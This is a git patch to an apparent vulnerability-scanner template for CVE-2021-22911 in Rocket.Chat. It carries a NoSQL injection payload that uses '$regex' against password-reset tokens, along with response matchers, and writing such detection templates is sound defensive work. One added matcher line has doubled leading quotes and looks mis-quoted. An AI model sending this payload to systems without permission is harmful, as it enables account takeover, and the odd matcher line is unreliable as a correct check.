From 1e985c9efae1410fbdb3968da5bc2dfd83add2bc Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Sep 2022 08:43:42 +0530 Subject: [PATCH] Update CVE-2021-22911.yaml --- cves/2022/CVE-2021-22911.yaml | 13 +++++-------- 1 file changed, 5 insertions(+), 8 deletions(-) diff --git a/cves/2022/CVE-2021-22911.yaml b/cves/2022/CVE-2021-22911.yaml index 8d6ce44df3..79d12463b0 100644 --- a/cves/2022/CVE-2021-22911.yaml +++ b/cves/2022/CVE-2021-22911.yaml @@ -27,20 +27,17 @@ requests: Content-Type: application/json Content-Length: 123 - {"message": - "{\"msg\":\"method\", \"method\": \"getPasswordPolicy\", \"params\": [{\"token\": {\"$regex\": \"^6\"}}] }"} + {"message": "{\"msg\":\"method\", \"method\": \"getPasswordPolicy\", \"params\": [{\"token\": {\"$regex\": \"^6\"}}] }"} matchers-condition: and matchers: - type: word part: body words: - - '[error-invalid-user]' - - type: word - part: body - words: - - '"success":true' + - ''[error-invalid-user]' + - '"success":true' + condition: and - type: status status: - - 200 + - 200